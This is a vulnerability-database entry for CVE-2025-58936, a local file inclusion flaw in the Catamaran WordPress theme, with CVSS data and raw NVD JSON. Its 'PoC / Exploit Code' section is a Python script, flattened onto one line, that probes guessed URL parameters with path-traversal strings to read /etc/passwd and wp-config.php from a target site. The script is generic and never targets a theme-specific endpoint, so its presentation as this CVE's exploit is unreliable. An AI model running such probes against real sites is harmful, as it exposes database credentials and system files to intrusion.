Security Vulnerability Report
中文
CVE-2025-58936 CVSS 8.1 HIGH

CVE-2025-58936

Published: 2025-12-18 08:16:01
Last Modified: 2026-04-27 20:16:21

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catamaran catamaran allows PHP Local File Inclusion.This issue affects Catamaran: from n/a through <= 1.15.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:axiomthemes:catamaran:*:*:*:*:*:wordpress:*:* - VULNERABLE
Catamaran Theme <= 1.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-58936 PoC - Catamaran Theme Local File Inclusion # Target: WordPress site using Catamaran theme <= 1.15 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-58936""" # Sensitive files to test test_files = [ '../../../../etc/passwd', '../../../../wp-config.php', '../../../wp-config.php', '../../../../etc/hosts' ] # Common parameter names used in file inclusion vulnerabilities param_names = ['file', 'page', 'template', 'view', 'load', 'include'] vulnerable = False for param in param_names: for test_file in test_files: try: # Construct malicious URL test_url = f"{target_url}/?{param}={test_file}" response = requests.get(test_url, timeout=10) # Check for file inclusion indicators if 'root:' in response.text or 'DB_NAME' in response.text: print(f"[!] VULNERABLE! Parameter: {param}") print(f"[!] File included: {test_file}") print(f"[!] URL: {test_url}") vulnerable = True return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {test_url}: {e}") continue if not vulnerable: print("[*] Target does not appear to be vulnerable") return vulnerable def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-58936-poc.py <target_url>") print("Example: python cve-2025-58936-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-58936 - Catamaran Theme LFI\n") check_vulnerability(target) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58936", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:01.197", "lastModified": "2026-04-27T20:16:20.503", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Catamaran catamaran allows PHP Local File Inclusion.This issue affects Catamaran: from n/a through <= 1.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:axiomthemes:catamaran:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.15", "matchCriteriaId": "20C25BA9-A7C8-4AAF-9A92-5FE8137536C5"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/catamaran/vulnerability/wordpress-catamaran-theme-1-15-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}